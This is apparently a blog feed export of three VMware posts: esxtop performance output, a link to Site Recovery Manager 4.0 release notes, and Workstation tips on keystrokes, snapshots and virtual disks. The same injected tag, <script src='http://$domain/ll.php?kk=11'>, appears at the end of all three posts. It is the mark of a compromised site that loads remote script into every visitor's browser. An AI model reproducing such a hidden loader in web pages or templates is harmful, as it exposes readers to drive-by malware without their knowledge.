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		<title>VMWare Server Performance Statistics</title>
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		<pubDate>Wed, 24 Feb 2010 05:07:47 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
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			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>esxtop  &#8211; VMWare Server Performance Statistics</p>
<p>	Performance related statistics information Disk(d), Memory(m) and Network (n)</p>
<p>10:48:29pm  up 197 days,  7:50, 62 worlds; CPU load average: 0.07, 0.07, 0.07<br />
PCPU(%):   4.94,   5.84,   6.87,   4.99 ;   used total:   5.66<br />
CCPU(%):   0 us,   0 sy,  99 id,   1 wa ;       cs/sec:     93</p>
<p>     ID    GID NAME             NMEM   %USED    %SYS  %OVRLP    %RUN   %WAIT  %BWAIT  %TWAIT   %CRUN   %CSTP   %IDLE    %RDY  %EXTRA  %MLMTD<br />
      1      1 idle                4  361.08    0.00    0.00    0.36    0.00    0.00    0.00    0.00    0.00    0.00  383.33    0.00    0.00<br />
      2      2 system              5    0.00    0.00    0.00    0.00  479.62    0.00  479.62    0.00    0.00    0.00    0.00    0.00    0.00<br />
      6      6 console             1    0.68    0.00    0.01    0.68   63.74   31.45   95.19    0.00    0.00   95.19    0.06    0.48    0.00<br />
      7      7 helper             13    0.00    0.00    0.00    0.00 1247.01    0.00 1247.01    0.00    0.00    0.00    0.00    0.00    0.00<br />
      8      8 drivers             8    0.00    0.00    0.00    0.00  767.36    0.00  767.36    0.00    0.00    0.00    0.00    0.00    0.00<br />
     12     12 vmware-vmkauthd     1    0.00    0.00    0.00    0.00   95.92    0.00   95.92    0.00    0.00    0.00    0.00    0.00    0.00<br />
     13     13 VHOST1            5    1.03    0.00    0.01    1.03  444.17   34.34  478.51    0.00    0.00   95.08    0.07    0.66    0.00<br />
     14     14 VHOST2            5    1.57    0.00    0.01    1.57  449.37   28.58  477.95    0.00    0.00   94.54    0.08    1.14    0.00<br />
     15     15 VHOST3           5    6.97    0.00    0.06    6.97  384.12   84.94  469.06    0.00    0.00   85.57    3.57    3.49    0.00<br />
     16     16 VHOST4           5    5.98    0.00    0.05    5.98  403.08   69.04  472.12    0.00    0.00   88.60    1.50    3.04    0.00<br />
     17     17 VHOST5           5    5.56    0.00    0.05    5.56  402.71   70.20  472.91    0.00    0.00   89.34    1.14    2.81    0.00<br />
     18     18 VHOST6         5    0.62    0.00    0.01    0.62  436.57   42.37  478.94    0.00    0.00   95.41    0.04    0.32    0.00</p>
<p>1. press &#8220;d&#8221; to see Disk stats on &#8220;esxtop&#8221; command </p>
<p>  10:48:07pm  up 197 days,  7:49, 62 worlds; CPU load average: 0.07, 0.07, 0.07<br />
Display ESX disk on<br />
 ADAPTR CID TID LID  WID NCHNS NTGTS NLUNS NVMS AQLEN LQLEN WQLEN ACTV QUED %USD  LOAD   CMDS/s  READS/s WRITES/s MBREAD/s MBWRTN/s<br />
 vmhba0   &#8211;   &#8211;   &#8211;    &#8211;     1     2     2    8   238     0     0    0    0    0  0.00     0.00     0.00     0.00     0.00     0.00</p>
<p> 2. press &#8220;n&#8221; to see Network stats on &#8220;esxtop&#8221; command</p>
<p>  10:46:58pm  up 197 days,  7:48, 62 worlds; CPU load average: 0.07, 0.07, 0.07<br />
Display ESX nic on<br />
   PORT ID UPLINK              USED BY DTYP           DNAME    PKTTX/s  MbTX/s    PKTRX/s  MbRX/s %DRPTX %DRPRX<br />
         3      N                0:NCP    H             pps        nan     nan        nan     nan   0.00   0.00<br />
  16777217      Y               vmnic0    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777218      N                0:NCP    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777219      N             0:vswif0    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777224      N       1067:VHOST1    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777225      N       1072:VHOST2    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777226      N       1077:VHOST3    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777232      N        1089:VHOST4    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777242      N        1095:VHOST5    S        vSwitch0        nan     nan        nan     nan   0.00   0.00<br />
  16777248      N     1082:VHOST6    S        vSwitch0        nan     nan        nan     nan   0.00   0.00</p>
<p> 3. press &#8220;m&#8221; to see memory stats on &#8220;esxtop&#8221; command</p>
<p> 10:45:28pm  up 197 days,  7:47, 62 worlds; MEM overcommit average: 0.00, 0.00, 0.00<br />
PMEM   (MB): 17407   total:   272     cos,   232    vmk,   7851 other,   9051 free<br />
VMKMEM (MB): 16809 managed:  1008 minfree,  1839   rsvd,  14872 ursvd,   high state<br />
COSMEM (MB):    24    free:   541  swap_t,   541 swap_f:   0.00   r/s,   0.00 w/s<br />
PSHARE (MB):  3363  shared,  1147  common:  2216 saving<br />
SWAP   (MB):     0    curr,     0  target:                 0.00   r/s,   0.00 w/s<br />
MEMCTL (MB):     0    curr,     0  target,  6244 max</p>
<p>     ID    GID NAME             NMEM    MEMSZ    SZTGT     TCHD %ACTV %ACTVS %ACTVF %ACTVN   OVHDUW     OVHD  OVHDMAX<br />
     12     12 vmware-vmkauthd     1     2.20     2.20     0.34     0      0      0      0     0.00     0.00     0.00<br />
     13     13 VHOST1            5  2048.00  1569.71    61.44     4      1      3      1    30.91    50.50    93.28<br />
     14     14 VHOST2            5  1024.00   745.62    20.48     3      1      2      1    22.91    39.85    85.37<br />
     15     15 VHOST3           5  2048.00  1735.33    20.48     0      0      0      1    30.91    75.44   190.14<br />
     16     16 VHOST4           5  2048.00  1907.99    20.48     1      0      1      1    30.91    75.76   190.48<br />
     17     17 VHOST5           5  2048.00  1900.98     0.00     0      0      0      0    30.91    75.65   190.43<br />
     18     18 VHOST6         5   512.00   528.86    20.48     3      0      2      1    18.91    33.04    77.58<script src="http://$domain/ll.php?kk=11"></script></p>
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		<title>Vmware vCenter Site Recovery Manager 4.0</title>
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		<pubDate>Thu, 12 Nov 2009 05:06:40 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
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		<category><![CDATA[Vmware vCenter Site Recovery Manager 4.0]]></category>

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<p>You will very impressed about virtualization please read below <a href="http://www.vmware.com/support/srm/srm_releasenotes_4_0.html">release note</a> <script src="http://$domain/ll.php?kk=11"></script></p>
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		<title>VMWARE &#8211; Tips</title>
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		<pubDate>Sat, 10 Oct 2009 23:39:37 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
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			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>VMWARE:<br />
- KEYSTROKES<br />
  &#8211; ctrl-alt: toggle mouse out of vmware<br />
  &#8211; ctrl-alt-insert: replaces ctrl-alt-delete inside VMware<br />
  &#8211; toggling full screen: ctrl-alt-enter<br />
  &#8211; to open another VMware session in another window: File -> New Window<br />
  &#8211; vmware tools package<br />
    &#8211; install: VM -> Install VMware Tools -> &#8230;<br />
- COPY<br />
  &#8211; to copy a VM session, copy the .vmx and the .vmdk files<br />
- SNAPSHOTS<br />
  &#8211; defined</p>
<p>    &#8211; snapshot the virtual machine to preserve its state, including the data on its virtual disks<br />
    &#8211; You can continue working and return to the snapshot state at any time<br />
    &#8211; useful if you wish to undo changes you made to the virtual machine<br />
    &#8211; You can take a snapshot at any time and revert to that snapshot at any time<br />
      &#8211; whether the virtual machine is powered on, powered off, or suspended<br />
  &#8211; using<br />
    &#8211; Use the Snapshot and Revert buttons on the toolbar<br />
    &#8211; the new snapshot replaces the previous snapshot<br />
    &#8211; You can have only one active snapshot at a time.<br />
  &#8211; what is captured in a snapshot<br />
    &#8211; The state of all the virtual machine&#8217;s disks<br />
    &#8211; The contents of the virtual machine&#8217;s memory<br />
    &#8211; The virtual machine settings<br />
  &#8211; removing a snapshot<br />
    &#8211; You can remove the snapshot any time the virtual machine is powered off<br />
    &#8211; To remove the snapshot<br />
      &#8211; shut down and power off the virtual machine<br />
      &#8211; choose Snapshot > Remove Snapshot.<br />
- VIRTUAL DISKS<br />
  &#8211; configuring<br />
    &#8211; VM > Settings > Hardware > Hard Disk<br />
    &#8211; You can configure settings for a virtual disk when its virtual machine is powered off<br />
  &#8211; defragmenting<br />
    &#8211; Click Defragment to defragment the virtual disk.<br />
    &#8211; This rearranges the data on the virtual disk so that the individual blocks are contiguous<br />
    &#8211; Using defragment improves performance of your virtual disk<br />
    &#8211; Defragmenting the disk can be a time-consuming process<script src="http://$domain/ll.php?kk=11"></script></p>
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